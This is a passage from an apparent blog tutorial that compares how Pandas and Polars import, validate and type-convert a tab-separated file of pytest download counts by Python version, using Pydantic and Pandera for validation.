&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;downloads_pd &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;read_csv(files[&lt;span style="color:#a5d6ff"&gt;&amp;#34;pytest_data&amp;#34;&lt;/span&gt;], sep&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;\t&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;downloads_pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;head()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre&gt;&lt;code&gt;## category percent downloads
## 0 3.11 23.40% 282,343,944
## 1 3.9 18.78% 226,548,604
## 2 3.10 18.74% 226,155,405
## 3 3.12 15.48% 186,819,921
## 4 NaN 8.41% 101,489,156
&lt;/code&gt;&lt;/pre&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;polars&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pl&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;downloads_pl &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pl&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;read_csv(files[&lt;span style="color:#a5d6ff"&gt;&amp;#34;pytest_data&amp;#34;&lt;/span&gt;], separator&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;\t&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;downloads_pl&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;head()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre&gt;&lt;code&gt;## shape: (5, 3)
## ┌──────────┬─────────┬─────────────┐
## │ category ┆ percent ┆ downloads │
## │ --- ┆ --- ┆ --- │
## │ str ┆ str ┆ str │
## ╞══════════╪═════════╪═════════════╡
## │ 3.11 ┆ 23.40% ┆ 282,343,944 │
## │ 3.9 ┆ 18.78% ┆ 226,548,604 │
## │ 3.10 ┆ 18.74% ┆ 226,155,405 │
## │ 3.12 ┆ 15.48% ┆ 186,819,921 │
## │ null ┆ 8.41% ┆ 101,489,156 │
## └──────────┴─────────┴─────────────┘
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;We can see that &lt;code&gt;pytest&lt;/code&gt; was downloaded roughly 280 million times on Python
3.11, and this accounted for about 23% of downloads.&lt;/p&gt;
&lt;p&gt;The syntax for importing the dataset using the two libraries is almost
identical. The only difference for the &lt;code&gt;read_csv()&lt;/code&gt; function is that you
use &lt;code&gt;sep=...&lt;/code&gt; in Pandas and &lt;code&gt;separator=...&lt;/code&gt; in Polars.&lt;/p&gt;
&lt;p&gt;Polars is
&lt;a href="https://pythonspeed.com/articles/polars-memory-pandas/" rel="external"&gt;more memory efficient&lt;/a&gt;
than Pandas in a lot of settings. One of the memory efficiencies that Polars
allows is filtering by rows and columns during import. To take
advantage of this, you can use the &lt;code&gt;scan_csv()&lt;/code&gt; function in Polars. This
creates a lazy data-frame (a &lt;code&gt;LazyFrame&lt;/code&gt;) that can be manipulated with much
the same methods as a Polars DataFrame. These method calls are applied at the point when the
data is loaded, rather than on an in-memory data-frame. The Polars
website has
&lt;a href="https://docs.pola.rs/user-guide/concepts/lazy-api/" rel="external"&gt;far more details&lt;/a&gt; about the
lazy API, and the benefits it can bring to your work.&lt;/p&gt;
&lt;p&gt;Here, we will be working with eagerly loaded, in-memory data-frames, which are a
good choice during exploratory work.&lt;/p&gt;
&lt;!---
What would I miss from R? Are they available in standard libraries
- importing columns as a specified data-type
- data-manipulation syntax
- working with DB using DF code
--&gt;
&lt;h2 id="validating-a-dataset"&gt;Validating a dataset&lt;/h2&gt;
&lt;p&gt;Have we loaded what we wanted?&lt;/p&gt;
&lt;p&gt;The Pandas/Polars &lt;code&gt;.dtypes&lt;/code&gt; attribute gives you information about the
data-types in each column of a data-frame:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;print(downloads_pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;dtypes)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre&gt;&lt;code&gt;## category object
## percent object
## downloads object
## dtype: object
&lt;/code&gt;&lt;/pre&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;print(downloads_pl&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;dtypes)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre&gt;&lt;code&gt;## [String, String, String]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Again, the formatting of the output looks a little different between the
two packages, but the results are broadly similar: all of our data (the
version-strings in ‘category’, the percentage values and the download
counts) have been read as character strings. Pandas tells us they are
‘object’s, but that typically means they are strings:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;type(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; downloads_pd[&lt;span style="color:#a5d6ff"&gt;&amp;#34;category&amp;#34;&lt;/span&gt;][&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre&gt;&lt;code&gt;## &amp;lt;class 'str'&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So Python has imported our data incorrectly. In a real project we would
want to know about this, so we might validate the data in our datasets.
We would also want to prevent data-import mistakes as far as possible
(see later) by being more explicit about how each column is imported and
converted.&lt;/p&gt;
&lt;p&gt;Python has a range of packages for validating both the schema for, and
the values in, a dataset.&lt;/p&gt;
&lt;p&gt;For a general class, if you want to check the data-types that are stored
in the fields, you could use
&lt;a href="https://docs.pydantic.dev/latest/" rel="external"&gt;Pydantic&lt;/a&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# [Terminal]
pip install pydantic
&lt;/code&gt;&lt;/pre&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pydantic&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; BaseModel, NonNegativeInt
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;class&lt;/span&gt; &lt;span style="color:#f0883e;font-weight:bold"&gt;Person&lt;/span&gt;(BaseModel):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; name: str
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; age: NonNegativeInt
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Correct data-types cause no fuss:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Person(name&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;Russ&amp;#34;&lt;/span&gt;, age&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;47&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre&gt;&lt;code&gt;## Person(name='Russ', age=47)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But incorrect data (here a negative age) throw errors:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Person(name&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;Buddy&amp;#34;&lt;/span&gt;, age&lt;span style="color:#ff7b72;font-weight:bold"&gt;=-&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre&gt;&lt;code&gt;## pydantic_core._pydantic_core.ValidationError: 1 validation error for Person
## age
## Input should be greater than or equal to 0 [type=greater_than_equal, input_value=-1, input_type=int]
## For further information visit https://errors.pydantic.dev/2.11/v/greater_than_equal
&lt;/code&gt;&lt;/pre&gt;
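&lt;p&gt;In a longer script you would probably catch the error rather than let it stop everything. The following is a minimal sketch, assuming Pydantic version 2 (the version that appears in the error message above); the &lt;code&gt;problems&lt;/code&gt; list is a name made up for this example.&lt;/p&gt;

```python
from pydantic import BaseModel, NonNegativeInt, ValidationError


class Person(BaseModel):
    name: str
    age: NonNegativeInt


try:
    Person(name="Buddy", age=-1)
    problems = []
except ValidationError as err:
    # Each entry records which field failed and which rule it broke
    problems = [(item["loc"], item["type"]) for item in err.errors()]

print(problems)
```

&lt;p&gt;Collecting the failures like this makes it possible to log them or report them back, instead of reading them from a traceback.&lt;/p&gt;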
&lt;p&gt;There are similar validation tools that work with data-frames. For
example, &lt;a href="https://pandera.readthedocs.io/en/stable/index.html" rel="external"&gt;Pandera&lt;/a&gt;
can work with Pandas, Polars and several other data-frame libraries. You
need to install a different Pandera extra depending on the
data-frame library you are working with (“pandera[pandas]” for Pandas,
“pandera[polars]” for Polars, etc.).&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# Terminal
pip install &amp;quot;pandera[pandas]&amp;quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pandera.pandas&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pa&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;schema &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pa&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;DataFrameSchema({
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;category&amp;#34;&lt;/span&gt;: pa&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;Column(str, nullable&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;True&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;percent&amp;#34;&lt;/span&gt;: pa&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;Column(float, checks&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;pa&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;Check&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;in_range(&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;100&lt;/span&gt;)),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;downloads&amp;#34;&lt;/span&gt;: pa&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;Column(int)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;})
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;schema&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;validate(downloads_pd)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre&gt;&lt;code&gt;## pandera.errors.SchemaError: non-nullable series 'percent' contains null values:
## 17 NaN
## 18 NaN
## Name: percent, dtype: object
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Validation of the data has identified an issue with the dataset. There
are missing values in the “percent” column in the last two rows of the
dataset. There are other issues (the two numeric columns are currently
strings) but let’s check out the issue that Pandera has identified
first.&lt;/p&gt;
&lt;p&gt;This is the end of the dataset:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;downloads_pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;tail()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre&gt;&lt;code&gt;## category percent downloads
## 14 3.3 0.00% 2,259
## 15 2.6 0.00% 87
## 16 3.2 0.00% 68
## 17 Total NaN 1,206,596,056
## 18 Date range: 2024-12-31 - 2025-07-07 NaN NaN
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;There is some metadata in the final couple of lines of the
file (a total row and a date range) that should not be treated as data.
Let’s skip those lines by reading only the first 17 rows (this isn’t a
very robust solution, but is fine for now).&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;downloads_pd &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;read_csv(files[&lt;span style="color:#a5d6ff"&gt;&amp;#34;pytest_data&amp;#34;&lt;/span&gt;], sep&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;\t&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;&lt;/span&gt;, nrows &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;17&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;downloads_pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;tail()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre&gt;&lt;code&gt;## category percent downloads
## 12 3.40 0.00% 12,777
## 13 3.15 0.00% 2,882
## 14 3.30 0.00% 2,259
## 15 2.60 0.00% 87
## 16 3.20 0.00% 68
&lt;/code&gt;&lt;/pre&gt;
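&lt;p&gt;A slightly more robust alternative, sketched here under the assumption that genuine data rows always have a value in the “percent” column, is to read everything as text and drop the rows where “percent” is missing. The text below is a shortened stand-in for the real file, and the variable names are made up for this example.&lt;/p&gt;

```python
import io

import pandas as pd

# Shortened stand-in for the real file, including the two footer lines
tsv = (
    "category\tpercent\tdownloads\n"
    "3.11\t23.40%\t282,343,944\n"
    "\t8.41%\t101,489,156\n"
    "3.2\t0.00%\t68\n"
    "Total\t\t1,206,596,056\n"
    "Date range: 2024-12-31 - 2025-07-07\t\t\n"
)

# Read every column as text so that nothing is converted silently
raw = pd.read_csv(io.StringIO(tsv), sep="\t", dtype=str)

# Footer lines have no percent value, so dropping those rows removes the metadata
clean = raw.dropna(subset=["percent"])
print(clean)
```

&lt;p&gt;Unlike a fixed row count, this keeps working if more Python versions are added to the file, although it would also drop any genuine row that happened to lack a percentage.&lt;/p&gt;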
&lt;p&gt;Now if we validate the Pandas data-frame again, another issue is
identified.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;schema&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;validate(downloads_pd)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre&gt;&lt;code&gt;## pandera.errors.SchemaError: expected series 'category' to have type str:
## failure cases:
## index failure_case
## 0 0 3.11
## 1 1 3.90
## 2 2 3.10
## 3 3 3.12
## 4 5 3.80
## 5 6 3.13
## 6 7 3.70
## 7 8 3.60
## 8 9 2.70
## 9 10 3.14
## 10 11 3.50
## 11 12 3.40
## 12 13 3.15
## 13 14 3.30
## 14 15 2.60
## 15 16 3.20
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This is a more substantial issue: the Python version-strings (3.2, 3.3
and so on) have been converted into floating-point numbers during
import. So Python version “3.2” now appears as 3.20 in the data-frame, and
“3.10” is stored as a number that is equal to 3.1.&lt;/p&gt;
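&lt;p&gt;The effect is easy to reproduce on a tiny example. In this sketch the rows are invented for illustration (they are not taken from the Pytest dataset), and the second import shows one way of keeping version labels as text, namely passing a &lt;code&gt;dtype&lt;/code&gt; for that column to &lt;code&gt;read_csv()&lt;/code&gt;.&lt;/p&gt;

```python
import io

import pandas as pd

# Invented rows: "3.10" and "3.1" are different labels but the same number
tsv = "category\tdownloads\n3.10\t226155405\n3.1\t12\n3.2\t68\n"

# Default import: the column is inferred to be floating point
inferred = pd.read_csv(io.StringIO(tsv), sep="\t")

# Explicit import: the column is kept as text
as_text = pd.read_csv(io.StringIO(tsv), sep="\t", dtype={"category": str})

print(inferred["category"].tolist())
print(as_text["category"].tolist())
```

&lt;p&gt;With the default import, two distinct version labels collapse into one value; with the explicit data-type they stay distinct.&lt;/p&gt;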
&lt;p&gt;Rich Iannone has written a useful blog post comparing various
data-validation libraries for Polars at the &lt;a href="https://posit-dev.github.io/pointblank/blog/validation-libs-2025/" rel="external"&gt;“Posit-dev”
blog&lt;/a&gt;.
The tools mentioned in his post can check more substantial matters than
the missing-data, data-type and data-range issues that we mentioned
above. In particular, the tool
&lt;a href="https://posit-dev.github.io/pointblank/" rel="external"&gt;“pointblank”&lt;/a&gt; can create
data-validation summary reports that can be used to report back to
data-collection teams or to analysts. Python already had data-reporting
tools like &lt;a href="https://docs.greatexpectations.io/docs/core/introduction/" rel="external"&gt;“great
expectations”&lt;/a&gt;
and &lt;a href="https://www.tdda.info/" rel="external"&gt;“test-driven data analysis”&lt;/a&gt;.&lt;/p&gt;
&lt;h2 id="importing-with-data-type-constraints"&gt;Importing with data-type constraints&lt;/h2&gt;
&lt;p&gt;I knew the structure of the tab-separated file before attempting to load
it with Pandas and Polars. That is, I knew that the percents looked like
“12.34%” and that the download counts looked like “123,456,789” (with
commas separating the thousands and millions). Neither package can
automatically convert these number formats into the format that they
require without a bit of help. Even if we explained what the post-import
data-type should be for each column, the two libraries wouldn’t be able
to parse the input data directly.&lt;/p&gt;
&lt;p&gt;Both Polars and Pandas allow you to provide a pre-defined schema when
importing data. For Pandas, you provide a &lt;code&gt;dtype&lt;/code&gt; dictionary which
specifies what the output column data-type should be. For Polars, you
provide a &lt;code&gt;schema&lt;/code&gt; argument, where the data-types are specified in a
Polars-specific format (because the data is stored in Rust, the Python
&lt;code&gt;int&lt;/code&gt; and &lt;code&gt;str&lt;/code&gt; data-types don’t work for Polars).&lt;/p&gt;
&lt;p&gt;If we import our data using a schema, Pandas and Polars will complain:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;downloads_pd &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;read_csv(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; files[&lt;span style="color:#a5d6ff"&gt;&amp;#34;pytest_data&amp;#34;&lt;/span&gt;],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sep&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;\t&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; nrows &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;17&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dtype&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#a5d6ff"&gt;&amp;#34;category&amp;#34;&lt;/span&gt;: str, &lt;span style="color:#a5d6ff"&gt;&amp;#34;percent&amp;#34;&lt;/span&gt;: float, &lt;span style="color:#a5d6ff"&gt;&amp;#34;downloads&amp;#34;&lt;/span&gt;: int}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre&gt;&lt;code&gt;## ValueError: could not convert string to float: '23.40%'
&lt;/code&gt;&lt;/pre&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;downloads_pl &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pl&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;read_csv(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; files[&lt;span style="color:#a5d6ff"&gt;&amp;#34;pytest_data&amp;#34;&lt;/span&gt;],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; separator&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;\t&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; n_rows&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;17&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; schema&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#a5d6ff"&gt;&amp;#34;category&amp;#34;&lt;/span&gt;: pl&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;Utf8, &lt;span style="color:#a5d6ff"&gt;&amp;#34;percent&amp;#34;&lt;/span&gt;: pl&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;Float64, &lt;span style="color:#a5d6ff"&gt;&amp;#34;downloads&amp;#34;&lt;/span&gt;: pl&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;Int64}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre&gt;&lt;code&gt;## polars.exceptions.ComputeError: could not parse `&amp;quot;23.40%&amp;quot;` as dtype `f64` at column 'percent' (column number 2)
##
## The current offset in the file is 7 bytes.
##
## You might want to try:
## - increasing `infer_schema_length` (e.g. `infer_schema_length=10000`),
## - specifying correct dtype with the `schema_overrides` argument
## - setting `ignore_errors` to `True`,
## - adding `&amp;quot;23.40%&amp;quot;` to the `null_values` list.
##
## Original error: ```remaining bytes non-empty```
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The errors arise because we need to also specify how to convert our data
into the expected data-types when it isn’t obvious. This is done using
‘converters’ in Pandas:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;downloads_pd &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;read_csv(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; files[&lt;span style="color:#a5d6ff"&gt;&amp;#34;pytest_data&amp;#34;&lt;/span&gt;],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sep&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;\t&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; nrows &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;17&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dtype&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#a5d6ff"&gt;&amp;#34;category&amp;#34;&lt;/span&gt;: str},
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; converters &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# 12.34% -&amp;gt; 12.34&lt;/span&gt;
